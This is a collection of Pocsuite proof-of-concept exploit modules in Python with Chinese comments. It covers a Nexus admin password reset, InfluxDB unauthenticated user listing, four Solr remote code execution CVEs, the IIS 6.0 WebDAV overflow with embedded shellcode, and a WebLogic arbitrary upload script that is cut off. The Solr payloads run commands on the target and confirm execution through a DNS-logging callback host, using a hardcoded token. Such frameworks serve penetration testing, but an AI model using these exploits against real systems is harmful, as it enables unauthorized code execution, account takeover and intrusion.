        o['session'] = OptString('', description='current nexus session', require=False)
        o['password'] = OptString('', description='set admin password', require=False)
        return o

    def _verify(self):
        result = {}
        try:
            target = self.url + '/service/rest/beta/security/users/admin/change-password'
            data = """%s""" % self.get_option('password')
            r = requests.put(target, data=data, headers=self._headers)
            if r.status_code == 204:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = target
                result['VerifyInfo']['Password'] = self.get_option('password')
                result['VerifyInfo']['Info'] = 'change password success'
        except:
            pass
        return self.parse_output(result)

    @property
    def _headers(self):
        headers = {
            'accept': "application/json",
            'User-Agent': "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36",
            'NX-ANTI-CSRF-TOKEN': "0.6080434247960143",
            'Content-Type': "text/plain",
            'Origin': "http://127.0.0.1:8081",
            'Cookie': "NX-ANTI-CSRF-TOKEN=0.6080434247960143; NXSESSIONID=" + self.get_option('session') + ""
        }
        return headers

    def _attack(self):
        return self._verify()

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('not vulnerability')
        return output


register_poc(Nexus)


#!/usr/bin/env python
#coding=utf-8

import traceback

from pocsuite3.api import requests as req
from pocsuite3.api import register_poc
from pocsuite3.api import Output, POCBase
from pocsuite3.api import POC_CATEGORY, VUL_TYPE


class InfluxDB_POC(POCBase):
    vulID = 'InfluxDB-unauthorized-access'  # ssvid ID 如果是提交漏洞的同时提交 PoC,则写成 0
    appName = 'InfluxDB'
    appVersion = ''
    category = POC_CATEGORY.EXPLOITS.REMOTE
    vulType = VUL_TYPE.INFORMATION_DISCLOSURE

    vulDate = '2020-04-13'  # 漏洞公开的时间,不知道就写今天
    author = 'shadowsock5'  # PoC作者的大名
    createDate = '2020-04-13'  # 编写 PoC 的日期
    updateDate = '2020-04-13'  # PoC 更新的时间,默认和编写时间一样
    references = ['https://github.com/chaitin/xray/blob/master/pocs/influxdb-unauth.yml']  # 漏洞地址来源,0day不用写
    name = 'InfluxDB未授权访问漏洞'  # PoC 名称
    cvss = u"高危"

    
    def _verify(self):
        result={}

        vul_url = self.url
        target_url = vul_url

        PING_PATH = '/ping'
        PING_URL =  vul_url + PING_PATH

        QUERY_PATH = '/query?q=show%20users'
        QUERY_URL  = vul_url + QUERY_PATH


        try:
            resp = req.get(PING_URL)

            # 从响应头判断确实是InfluxDB
            if resp.status_code == 204 and "x-influxdb-version" in resp.headers:

                resp = req.get(QUERY_URL)
                str_resp_json = str(resp.json())

                # 响应头为200 且json响应字符串包含columns和user，则认为查询成功
                if resp.status_code == 200 and 'columns' in str_resp_json and 'user' in str_resp_json:
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['URL'] = target_url
                    return self.save_output(result)

                return self.save_output(result)
        except Exception as e:
            print(e)
            traceback.print_stack()
        
        return self.save_output(result)

    #漏洞攻击
    def _attack(self):
        return self._verify()



    def save_output(self, result):
        #判断有无结果并输出
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail()
        return output

register_poc(InfluxDB_POC)



#!/usr/bin/env python
#coding=utf-8

import random
import json
import time
import subprocess
import signal
import os
import sys
import base64
import re
from string import ascii_letters

from pocsuite3.api import requests as req
from pocsuite3.api import register_poc
from pocsuite3.api import Output, POCBase
from pocsuite3.api import POC_CATEGORY, VUL_TYPE

# 需要ysoserial.jar包
# 需要jython-standalone-2.7.1.jar，mjet.py

'''
CVE-2019-0193
'''
class Solr_RCE_0193(POCBase):
    vulID = 'solr-CVE-2019-1093'
    appName = 'Solr'
    appVersion = 'Apache Solr < 8.2.0'
    category = POC_CATEGORY.EXPLOITS.REMOTE
    vulType = VUL_TYPE.CODE_EXECUTION
    vulDate = '2019-08-01'  # 漏洞公开的时间,不知道就写今天
    author = 'shadowsock5'  # PoC作者的大名
    createDate = '2019-08-11'  # 编写 PoC 的日期
    updateDate = '2020-02-18'  # PoC 更新的时间,默认和编写时间一样
    references = ['https://www.openwall.com/lists/oss-security/2019/08/01/1']  # 漏洞地址来源,0day不用写
    name = 'Solr DataImportHandler远程代码执行漏洞'  # PoC 名称
    install_requires = []  # PoC 第三方模块依赖，请尽量不要使用第三方模块，必要时请参考《PoC第三方模块依赖说明》填写
    cvss = u"高危"

    
    # 使用随机字符串作为banner，通过ceye的接口判断命令是否被执行
    DOMAIN = 'wvg689.ceye.io'
    TOKEN = '76dce59a986eab595838f7dc74903035'
    BANNER = ''.join([random.choice(ascii_letters) for i in range(6)])
    CEYE_URL = 'http://api.ceye.io/v1/records?token={0}&type=dns&filter={1}'.format(TOKEN, BANNER)

    HTTP_PROXY = "http://192.168.170.1:8087"
    proxies = {"http": HTTP_PROXY, "https": HTTP_PROXY}


    def _verify(self):
        result={}

        vul_url = self.url
        
        url1 = vul_url + "/solr/admin/cores?wt=json"

        payload = '''
        command=full-import&dataConfig=
        <dataConfig>
            <dataSource type="URLDataSource"/>
                <script><![CDATA[ java.lang.Runtime.getRuntime().exec("ping {0}.{1}"); 
                ]]></script>
            <document>
                <entity name="a"
                    url="https://stackoverflow.com/feeds"
                    processor="XPathEntityProcessor"
                    forEach="/feed"
                    transformer="script:" />
            </document>
        </dataConfig>
        '''.format(self.BANNER, self.DOMAIN)

        url2 = self.get_vul_url(url1)

        url3 = url2 + "?" + payload
        
        try:
            req.get(url3, proxies=self.proxies)    # 利用。也可以用POST
        except Exception as e:
            print(e)
        
        time.sleep(2) # 休眠2s等待ceye生成记录
        if self.test_dnslog(self.CEYE_URL):
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = target_url
            return self.save_output(result)
        return self.save_output(result)


    ''' 拿到core的名字，并生成待利用的url'''
    def get_vul_url(self, p_url_cores):
        r = req.get(p_url_cores, verify=False, allow_redirects=False, proxies=self.proxies)
        
        if r.status_code == 200:
            if r.json()['status'] == "":    # 失败，退出
                return
            else:
                a = list(r.json()['status'].keys())
                p_vul_url = '{0}/solr/{1}/dataimport'.format(self.url, a[0])
        return p_vul_url


    # 验证DNS已被解析，命令执行
    def test_dnslog(self, url):
        resp = req.get(url)
        d = resp.json()
        try:
            name = d['data'][0]['name']
            if self.BANNER in name:
                return True
        except Exception:
            return False            


    # 攻击模块
    def _attack(self):
        return self._verify()

    # 输出报告
    def save_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail()
        return output



'''
CVE-2019-0192
'''
class Solr_RCE_0192(POCBase):
    vulID = 'solr-CVE-2019-1092'
    appName = 'Solr'
    appVersion = 'Apache Solr 5.0.0 to 5.5.5, 6.0.0 to 6.6.5'
    category = POC_CATEGORY.EXPLOITS.REMOTE
    vulType = VUL_TYPE.CODE_EXECUTION
    vulDate = '2019-03-12'  # 漏洞公开的时间,不知道就写今天
    author = 'shadowsock5'  # PoC作者的大名
    createDate = '2020-02-19'  # 编写 PoC 的日期
    updateDate = '2020-02-19'  # PoC 更新的时间,默认和编写时间一样
    references = ['https://mp.weixin.qq.com/s/ZtqM2EhB2BbZmDt1omvF6A']  # 漏洞地址来源,0day不用写
    name = 'Solr反序列化远程代码执行漏洞'  # PoC 名称
    install_requires = []  # PoC 第三方模块依赖，请尽量不要使用第三方模块，必要时请参考《PoC第三方模块依赖说明》填写
    cvss = u"高危"

    
    # 使用随机字符串作为banner，通过ceye的接口判断命令是否被执行
    DOMAIN = 'wvg689.ceye.io'
    TOKEN = '76dce59a986eab595838f7dc74903035'
    BANNER = ''.join([random.choice(ascii_letters) for i in range(6)])
    CEYE_URL = 'http://api.ceye.io/v1/records?token={0}&type=dns&filter={1}'.format(TOKEN, BANNER)

    HTTP_PROXY = "http://192.168.170.1:8087"


    def _verify(self):
        result={}

        vul_url = self.url    # "http://127.0.0.1:8983"

        target_url = vul_url
        url1 = vul_url + "/solr/admin/cores?wt=json"

        headers = {"Content-Type": "application/json"}

        command = "'ping {0}.{1}'".format(self.BANNER, self.DOMAIN)

        #command = base64.b64encode(command.encode('utf-8'))
        #command_str = command.decode('utf-8')
        #command_str = command_str.replace('/', '+')

        # 云上ysoserial文件路径
        YSOSERIAL_PATH = "/home/cqq/ysoserial-0.0.6-SNAPSHOT-BETA-all.jar"
        # 云上ysoserial的IP，以及监听的RMI端口
        RHOST = "192.168.170.139"   # 到时候填写ysoserial所在服务器的IP
        RPORT = "1099"


        pro = subprocess.Popen(
                "java -cp {0} ysoserial.exploit.JRMPListener {1} Jdk7u21 {2}".format(YSOSERIAL_PATH, RPORT, command), 
                stdout=subprocess.PIPE,shell=True, preexec_fn=os.setsid)

        post_json = {"set-property": {"jmx.serviceUrl": "service:jmx:rmi:///jndi/rmi://{0}:{1}/obj".format(RHOST, RPORT)}}

        url2 = self.get_vul_url(url1)
        
        # 漏洞利用
        r = req.post(url2, headers=headers, json=post_json, proxies={"http": self.HTTP_PROXY})

        if r.status_code == 500:
            m = re.search('(undeclared checked exception; nested exception is)', r.text)
            if m:
                pass    # 认为利用成功

        time.sleep(2) # 休眠2s等待ceye生成记录


        if self.test_dnslog(self.CEYE_URL):
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = target_url
            return self.save_output(result)
        return self.save_output(result)


    # 验证DNS已被解析，命令执行
    def test_dnslog(self, url):
        resp = req.get(url)
        d = resp.json()
        try:
            name = d['data'][0]['name']
            if self.BANNER in name:
                return True
        except Exception:
            return False            


    ''' 拿到core的名字，返回这个core的config路径'''
    def get_vul_url(self, p_url_cores):
        r = req.get(p_url_cores, verify=False, allow_redirects=False, proxies= {"http": self.HTTP_PROXY})
        
        if r.status_code == 200:
            if r.json()['status'] == "":    # 失败，退出
                self.save_output(result)
            else:
                a = list(r.json()['status'].keys())
        return '{0}/solr/{1}/config'.format(self.url, a[0])


    # 攻击模块
    def _attack(self):
        return self._verify()

    # 输出报告
    def save_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail()
        return output


'''
CVE-2019-17558
'''
class Solr_RCE_17558(POCBase):
    vulID = 'solr-CVE-2019-17558'
    appName = 'Solr'
    appVersion = '5.0.0 <= Apache Solr <= 8.3.1'
    category = POC_CATEGORY.EXPLOITS.REMOTE
    vulType = VUL_TYPE.CODE_EXECUTION
    vulDate = '2019-10-30'  # 漏洞公开的时间,不知道就写今天
    author = 'shadowsock5'  # PoC作者的大名
    createDate = '2019-10-31'  # 编写 PoC 的日期
    updateDate = '2020-02-18'  # PoC 更新的时间,默认和编写时间一样
    references = ['https://gist.githubusercontent.com/s00py/a1ba36a3689fa13759ff910e179fc133/raw/fae5e663ffac0e3996fd9dbb89438310719d347a/gistfile1.txt']  # 漏洞地址来源,0day不用写
    name = 'Solr模板注入远程代码执行漏洞'  # PoC 名称
    install_requires = []  # PoC 第三方模块依赖，请尽量不要使用第三方模块，必要时请参考《PoC第三方模块依赖说明》填写
    cvss = u"高危"

    
    # 使用随机字符串作为banner，通过ceye的接口判断命令是否被执行
    DOMAIN = 'wvg689.ceye.io'
    TOKEN = '76dce59a986eab595838f7dc74903035'
    BANNER = ''.join([random.choice(ascii_letters) for i in range(6)])
    CEYE_URL = 'http://api.ceye.io/v1/records?token={0}&type=dns&filter={1}'.format(TOKEN, BANNER)

    HTTP_PROXY = "http://192.168.170.1:8087"


    def _verify(self):
        result={}

        vul_url = self.url
        
        url_cores = vul_url + "/solr/admin/cores?wt=json"

        payload1_j = {
            "update-queryresponsewriter": {
                "name": "velocity",
                "class": "solr.VelocityResponseWriter",
                "template.base.dir": "",
                "params.resource.loader.enabled": "true"
            }
        }
        payload2 = "wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27ping%20{0}.{1}%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end".format(self.BANNER, self.DOMAIN)

        core_name = self.get_core_name(url_cores)

        select_url = "/solr/" + core_name + "/select"
        
        config_url = "/solr/" + core_name + "/config"

        url1 = vul_url + config_url
        url2 = vul_url + select_url + "?" + payload2
        
        # 第一步，配置
        r1 = req.post(url1, json=payload1_j)
        if r1.status_code == 200:
            # 第二步，利用
            r2 = req.get(url2)
        
        time.sleep(2) # 休眠2s等待ceye生成记录
        if self.test_dnslog(self.CEYE_URL):
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = target_url
            return self.save_output(result)
        return self.save_output(result)


    ''' 拿到core的名字'''
    def get_core_name(self, p_url_cores):
        r = req.get(p_url_cores, verify=False, allow_redirects=False)
        
        if r.status_code == 200:
            if r.json()['status'] == "":    # 失败，退出
                self.save_output(result)
            else:
                a = list(r.json()['status'].keys())
        return a[0]


    # 验证DNS已被解析，命令执行
    def test_dnslog(self, url):
        resp = req.get(url)
        d = resp.json()
        try:
            name = d['data'][0]['name']
            if self.BANNER in name:
                return True
        except Exception:
            return False            


    # 攻击模块
    def _attack(self):
        return self._verify()

    # 输出报告
    def save_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail()
        return output


'''
CVE-2019-12409
'''
class Solr_RCE_12409(POCBase):
    vulID = 'solr-CVE-2019-12409'
    appName = 'Solr'
    appVersion = 'Linux版的Solr 8.1.1和8.2.0版本'
    category = POC_CATEGORY.EXPLOITS.REMOTE
    vulType = VUL_TYPE.CODE_EXECUTION
    vulDate = '2019-11-19'  # 漏洞公开的时间,不知道就写今天
    author = 'shadowsock5'  # PoC作者的大名
    createDate = '2020-02-18'  # 编写 PoC 的日期
    updateDate = '2020-02-18'  # PoC 更新的时间,默认和编写时间一样
    references = ['https://mp.weixin.qq.com/s/co5NdHgjPbgVUu1-hzR4gA']  # 漏洞地址来源,0day不用写
    name = 'Solr JMX RCE'  # PoC 名称
    install_requires = []  # PoC 第三方模块依赖，请尽量不要使用第三方模块，必要时请参考《PoC第三方模块依赖说明》填写
    cvss = u"高危"

    
    # 使用随机字符串作为banner，通过ceye的接口判断命令是否被执行
    DOMAIN = 'wvg689.ceye.io'
    TOKEN = '76dce59a986eab595838f7dc74903035'
    BANNER = ''.join([random.choice(ascii_letters) for i in range(6)])
    CEYE_URL = 'http://api.ceye.io/v1/records?token={0}&type=dns&filter={1}'.format(TOKEN, BANNER)


    def _verify(self):
        result={}

        vul_url = self.url

        host = vul_url.strip("http://").strip("https://").split(':')[0]
        port = vul_url.strip("http://").strip("https://").split(':')[1]
        
        #payload = "/System/Applications/Calculator.app/Contents/MacOS/Calculator"
        payload = "'ping {0}.{1}'".format(self.BANNER, self.DOMAIN)

        # 云上jython文件路径
        JYTHON_PATH = "~/downloads/jython-standalone-2.7.1.jar"
        # mjet.py文件路径
        MJET_PATH = "mjet.py"
        # 云上mjet的web server监听的IP，端口
        RHOST = "192.168.170.1"
        RPORT = "8000"

        command1 = "java -jar {0}  {1} {2} {3} install super_secret http://{4}:{5} {5}".format(JYTHON_PATH, MJET_PATH, host, port, RHOST, RPORT)
        command2 = "java -jar {0}  {1} {2} {3} command super_secret {4}".format(JYTHON_PATH, MJET_PATH, host, port, payload)


        pro = subprocess.Popen(command1,
                stdout=subprocess.PIPE,shell=True, preexec_fn=os.setsid)
        
        pro = subprocess.Popen(command2,
                stdout=subprocess.PIPE,shell=True, preexec_fn=os.setsid)
     

        time.sleep(2) # 休眠2s等待ceye生成记录
        if self.test_dnslog(self.CEYE_URL):
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = target_url
            return self.save_output(result)
        return self.save_output(result)


    # 验证DNS已被解析，命令执行
    def test_dnslog(self, url):
        resp = req.get(url)
        d = resp.json()
        try:
            name = d['data'][0]['name']
            if self.BANNER in name:
                return True
        except Exception:
            return False            


    # 攻击模块
    def _attack(self):
        return self._verify()

    # 输出报告
    def save_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail()
        return output


# 注册类
register_poc(Solr_RCE_0193)
register_poc(Solr_RCE_0192)
register_poc(Solr_RCE_17558)
register_poc(Solr_RCE_12409)



#!/usr/bin/env python
# -*- coding: utf-8 -*-

"""
Copyright (c) 2014-2015 pocsuite developers (http://seebug.org)
See the file 'docs/COPYING' for copying permission
"""

# requests
from pocsuite.api.request import req
# register
from pocsuite.api.poc import register
# report
from pocsuite.api.poc import Output, POCBase
# url转换host
from pocsuite.lib.utils.funs import url2ip


# 基础基类
# CVE-2017-7269 IIS webdav RCE
class iis_RCE_POC(POCBase):
    vulID = '45'  # ssvid ID 如果是提交漏洞的同时提交 PoC,则写成 0
    version = '1'  # 默认为1
    vulDate = '2018-08-16'  # 漏洞公开的时间,不知道就写今天

    author = 'arr0w1'  # PoC作者的大名
    createDate = '2018-08-16'  # 编写 PoC 的日期
    updateDate = '2018-08-16'  # PoC 更新的时间,默认和编写时间一样
    references = ['https://nvd.nist.gov/vuln/detail/CVE-2017-7269']  # 漏洞地址来源,0day不用写
    name = 'CVE-2017-7269'  # PoC 名称
    appPowerLink = 'https://www.iis.net/'  # 漏洞厂商主页地址
    appName = 'IIS'  # 漏洞应用名称
    appVersion = '6.0'  # 漏洞影响版本
    vulType = 'cmd-exec'  # 漏洞类型,类型参考见 漏洞类型规范表
    desc = '''
    IIS 6.0 webdav RCE，CVE-2017-7269
    '''  # 漏洞简要描述
    samples = []  # 测试样列,就是用 PoC 测试成功的网站
    install_requires = ['socket','re']  # PoC 第三方模块依赖，请尽量不要使用第三方模块，必要时请参考《PoC第三方模块依赖说明》填写
    cvss = u"严重"  # 严重,高危,中危,低危

    # 指纹方法
    def _fingerprint(self):
        pass

    def _verify(self):
        # ip = self.url.split(':')[1].replace('/', '')
        # from api.utils import url2ip
        # --------------找url中 冒号后的web端口
        import re
        _port = re.findall(':(\d+)\s*', self.url)
        if len(_port) != 0:
            _port = url2ip(self.url)[1]
        else:
            _port = 80
        # -------------

        ip = url2ip(self.url)

        import socket
        result = {}

        pay = 'PROPFIND / HTTP/1.1\r\nHost: localhost\r\nContent-Length: 0\r\n'
        pay += 'If: <http://localhost/aaaaaaa'
        pay += '\xe6\xbd\xa8\xe7\xa1\xa3\xe7\x9d\xa1\xe7\x84\xb3\xe6\xa4\xb6\xe4\x9d\xb2\xe7\xa8\xb9\xe4\xad\xb7\xe4\xbd\xb0\xe7\x95\x93\xe7\xa9\x8f\xe4\xa1\xa8\xe5\x99\xa3\xe6\xb5\x94\xe6\xa1\x85\xe3\xa5\x93\xe5\x81\xac\xe5\x95\xa7\xe6\x9d\xa3\xe3\x8d\xa4\xe4\x98\xb0\xe7\xa1\x85\xe6\xa5\x92\xe5\x90\xb1\xe4\xb1\x98\xe6\xa9\x91\xe7\x89\x81\xe4\x88\xb1\xe7\x80\xb5\xe5\xa1\x90\xe3\x99\xa4\xe6\xb1\x87\xe3\x94\xb9\xe5\x91\xaa\xe5\x80\xb4\xe5\x91\x83\xe7\x9d\x92\xe5\x81\xa1\xe3\x88\xb2\xe6\xb5\x8b\xe6\xb0\xb4\xe3\x89\x87\xe6\x89\x81\xe3\x9d\x8d\xe5\x85\xa1\xe5\xa1\xa2\xe4\x9d\xb3\xe5\x89\x90\xe3\x99\xb0\xe7\x95\x84\xe6\xa1\xaa\xe3\x8d\xb4\xe4\xb9\x8a\xe7\xa1\xab\xe4\xa5\xb6\xe4\xb9\xb3\xe4\xb1\xaa\xe5\x9d\xba\xe6\xbd\xb1\xe5\xa1\x8a\xe3\x88\xb0\xe3\x9d\xae\xe4\xad\x89\xe5\x89\x8d\xe4\xa1\xa3\xe6\xbd\x8c\xe7\x95\x96\xe7\x95\xb5\xe6\x99\xaf\xe7\x99\xa8\xe4\x91\x8d\xe5\x81\xb0\xe7\xa8\xb6\xe6\x89\x8b\xe6\x95\x97\xe7\x95\x90\xe6\xa9\xb2\xe7\xa9\xab\xe7\x9d\xa2\xe7\x99\x98\xe6\x89\x88\xe6\x94\xb1\xe3\x81\x94\xe6\xb1\xb9\xe5\x81\x8a\xe5\x91\xa2\xe5\x80\xb3\xe3\x95\xb7\xe6\xa9\xb7\xe4\x85\x84\xe3\x8c\xb4\xe6\x91\xb6\xe4\xb5\x86\xe5\x99\x94\xe4\x9d\xac\xe6\x95\x83\xe7\x98\xb2\xe7\x89\xb8\xe5\x9d\xa9\xe4\x8c\xb8\xe6\x89\xb2\xe5\xa8\xb0\xe5\xa4\xb8\xe5\x91\x88\xc8\x82\xc8\x82\xe1\x8b\x80\xe6\xa0\x83\xe6\xb1\x84\xe5\x89\x96\xe4\xac\xb7\xe6\xb1\xad\xe4\xbd\x98\xe5\xa1\x9a\xe7\xa5\x90\xe4\xa5\xaa\xe5\xa1\x8f\xe4\xa9\x92\xe4\x85\x90\xe6\x99\x8d\xe1\x8f\x80\xe6\xa0\x83\xe4\xa0\xb4\xe6\x94\xb1\xe6\xbd\x83\xe6\xb9\xa6\xe7\x91\x81\xe4\x8d\xac\xe1\x8f\x80\xe6\xa0\x83\xe5\x8d\x83\xe6\xa9\x81\xe7\x81\x92\xe3\x8c\xb0\xe5\xa1\xa6\xe4\x89\x8c\xe7\x81\x8b\xe6\x8d\x86\xe5\x85\xb3\xe7\xa5\x81\xe7\xa9\x90\xe4\xa9\xac'
        pay += '>'
        pay += ' (Not <locktoken:write1>) <http://localhost/bbbbbbb'
        pay += '\xe7\xa5\x88\xe6\x85\xb5\xe4\xbd\x83\xe6\xbd\xa7\xe6\xad\xaf\xe4\xa1\x85\xe3\x99\x86\xe6\x9d\xb5\xe4\x90\xb3\xe3\xa1\xb1\xe5\x9d\xa5\xe5\xa9\xa2\xe5\x90\xb5\xe5\x99\xa1\xe6\xa5\x92\xe6\xa9\x93\xe5\x85\x97\xe3\xa1\x8e\xe5\xa5\x88\xe6\x8d\x95\xe4\xa5\xb1\xe4\x8d\xa4\xe6\x91\xb2\xe3\x91\xa8\xe4\x9d\x98\xe7\x85\xb9\xe3\x8d\xab\xe6\xad\x95\xe6\xb5\x88\xe5\x81\x8f\xe7\xa9\x86\xe3\x91\xb1\xe6\xbd\x94\xe7\x91\x83\xe5\xa5\x96\xe6\xbd\xaf\xe7\x8d\x81\xe3\x91\x97\xe6\x85\xa8\xe7\xa9\xb2\xe3\x9d\x85\xe4\xb5\x89\xe5\x9d\x8e\xe5\x91\x88\xe4\xb0\xb8\xe3\x99\xba\xe3\x95\xb2\xe6\x89\xa6\xe6\xb9\x83\xe4\xa1\xad\xe3\x95\x88\xe6\x85\xb7\xe4\xb5\x9a\xe6\x85\xb4\xe4\x84\xb3\xe4\x8d\xa5\xe5\x89\xb2\xe6\xb5\xa9\xe3\x99\xb1\xe4\xb9\xa4\xe6\xb8\xb9\xe6\x8d\x93\xe6\xad\xa4\xe5\x85\x86\xe4\xbc\xb0\xe7\xa1\xaf\xe7\x89\x93\xe6\x9d\x90\xe4\x95\x93\xe7\xa9\xa3\xe7\x84\xb9\xe4\xbd\x93\xe4\x91\x96\xe6\xbc\xb6\xe7\x8d\xb9\xe6\xa1\xb7\xe7\xa9\x96\xe6\x85\x8a\xe3\xa5\x85\xe3\x98\xb9\xe6\xb0\xb9\xe4\x94\xb1\xe3\x91\xb2\xe5\x8d\xa5\xe5\xa1\x8a\xe4\x91\x8e\xe7\xa9\x84\xe6\xb0\xb5\xe5\xa9\x96\xe6\x89\x81\xe6\xb9\xb2\xe6\x98\xb1\xe5\xa5\x99\xe5\x90\xb3\xe3\x85\x82\xe5\xa1\xa5\xe5\xa5\x81\xe7\x85\x90\xe3\x80\xb6\xe5\x9d\xb7\xe4\x91\x97\xe5\x8d\xa1\xe1\x8f\x80\xe6\xa0\x83\xe6\xb9\x8f\xe6\xa0\x80\xe6\xb9\x8f\xe6\xa0\x80\xe4\x89\x87\xe7\x99\xaa\xe1\x8f\x80\xe6\xa0\x83\xe4\x89\x97\xe4\xbd\xb4\xe5\xa5\x87\xe5\x88\xb4\xe4\xad\xa6\xe4\xad\x82\xe7\x91\xa4\xe7\xa1\xaf\xe6\x82\x82\xe6\xa0\x81\xe5\x84\xb5\xe7\x89\xba\xe7\x91\xba\xe4\xb5\x87\xe4\x91\x99\xe5\x9d\x97\xeb\x84\x93\xe6\xa0\x80\xe3\x85\xb6\xe6\xb9\xaf\xe2\x93\xa3\xe6\xa0\x81\xe1\x91\xa0\xe6\xa0\x83\xcc\x80\xe7\xbf\xbe\xef\xbf\xbf\xef\xbf\xbf\xe1\x8f\x80\xe6\xa0\x83\xd1\xae\xe6\xa0\x83\xe7\x85\xae\xe7\x91\xb0\xe1\x90\xb4\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81\xe9\x8e\x91\xe6\xa0\x80\xe3\xa4\xb1\xe6\x99\xae\xe4\xa5\x95\xe3\x81\x92\xe5\x91\xab\xe7\x99\xab\xe7\x89\x8a\xe7\xa5\xa1\xe1\x90\x9c\xe6\xa0\x83\xe6\xb8\x85\xe6\xa0\x80\xe7\x9c\xb2\xe7\xa5\xa8\xe4\xb5\xa9\xe3\x99\xac\xe4\x91\xa8\xe4\xb5\xb0\xe8\x89\x86\xe6\xa0\x80\xe4\xa1\xb7\xe3\x89\x93\xe1\xb6\xaa\xe6\xa0\x82\xe6\xbd\xaa\xe4\x8c\xb5\xe1\x8f\xb8\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81'
        shellcode = 'VVYA4444444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBRDDKLMN8KPM0KP4KOYM4CQJIOPKSKPKPTKLITKKQDKU0G0KPKPM00QQXI8KPM0M0K8KPKPKPM0QNTKKNU397N30WRJLMSSI7LNR72JPTKOXPZKQH0CR615NMNRP0NQNWNMOGP206NYKPOSRORN3D35RND4NMPTD9RP2ENZMPT4352XCDNOS8BTBMBLLMKZOSROBN441URNT4NMPL2ERNS7SDBHOJOBNVO0LMLJLMKZ0HOXOY0TO0OS260ENMNRP0NQOGNMOGOB06OIMP2345RCS3RET3D3M0KLK8SRM0KPM0C0SYK5NQWP2DDK0PNP4KQBLLTKQBMDDKD2MXLOGG0JO6NQKO6LOLQQSLKRNLMP7QXOLMM18G9RJRR2R74KQBLP4K0JOL4K0LN1RXK3PHKQHQ0Q4K29MPM19CTKQ9MH9SOJQ94KNTTKKQJ6P1KOFLY1XOLMKQXGNX9PD5KFM33MKHOKSMO42UJDPXTKB8O4KQIC1V4KLL0K4K0XMLKQXSTKKTTKKQJ0CYQ4O4MTQKQK1QR90Z0QKOYPQOQOQJ4KLRJKTM1MWKOWMCBR2OQZKPPSKOYEKPA'
        pay += shellcode
        pay += '>\r\n\r\n'

        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.connect((ip, _port))  # ip port
        sock.send(pay)

        try:
            data = sock.recv(80960)
        except:
            pass

        sock.close()

        if not -1 == data.find('HHIT CVE-2017-7269 Success'):
            message = '%s is vulnerable!' % ip + 'CVE-2017-7269 vulnerability!'
            print(message)
            result['VerifyInfo'] = {}
            result['VerifyInfo']['url'] = ip
            result['VerifyInfo']['Payload'] = pay
            return True

        else:
            return False

        return self.save_output(result)

    # 攻击模块
    def _attack(self):
        pass

    # 输出报告
    def save_output(self, result):
        # 判断有无结果并输出
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail()
        return output


# 注册类
register(iis_RCE_POC)



#!/usr/bin/env python
# coding: utf-8
import re
import sys
import time
import traceback
import xml.etree.ElementTree as ET

from pocsuite.api.request import req #用法和 requests 完全相同
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase



def get_current_work_path(host):
    geturl = host + "/ws_utc/resources/setting/options/general"
    ua = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:49.0) Gecko/20100101 Firefox/49.0'}
    values = []
    try:
        resp = req.get(geturl)
        if resp.status_code == 404:
            exit("[-] {}  don't exists CVE-2018-2894".format(host))
        elif "Deploying Application".lower() in resp.text.lower():
            print("[*] First Deploying Website Please wait a moment ...")
            time.sleep(20)
            resp = req.get(geturl, headers=ua)
        if "</defaultValue>" in resp.content:
            root = ET.fromstring(resp.content)
            value = root.find("section").find("options")
            for e in value:
                for sub in e:
                    if e.tag == "parameter" and sub.tag == "defaultValue":
                        values.append(sub.text)
    except req.ConnectionError:
        exit("[-] Cannot connect url: {}".format(geturl))
    if values:
        return values[0]
    else:
        print("[-] Cannot get current work path\n")
        exit(resp.content)

def get_new_work_path(host):
    origin_work_path = get_current_work_path(host)
    works = "/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css"
    if "user_projects" in origin_work_path:
        if "\\" in origin_work_path:
            works = works.replace("/", "\\")
            current_work_home = origin_work_path[:origin_work_path.find("user_projects")] + "user_projects\\domains"
            dir_len = len(current_work_home.split("\\"))
            domain_name = origin_work_path.split("\\")[dir_len]
            current_work_home += "\\" + domain_name + works
        else:
            current_work_home = origin_work_path[:origin_work_path.find("user_projects")] + "user_projects/domains"
            dir_len = len(current_work_home.split("/"))
            domain_name = origin_work_path.split("/")[dir_len]
            current_work_home += "/" + domain_name + works
    else:
        current_work_home = origin_work_path
        print("[*] cannot handle current work home dir: {}".format(origin_work_path))
    return current_work_home

def set_new_upload_path(host, path):
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded',
        'X-Requested-With': 'XMLHttpRequest', }
    data = {
        "setting_id": "general",
        "BasicConfigOptions.workDir": path,
        "BasicConfigOptions.proxyHost": "",
        "BasicConfigOptions.proxyPort": "80"}
    resp = req.post(host + "/ws_utc/resources/setting/options", data=data, headers=headers)
    if "successfully" in resp.content:
        return True
    else:
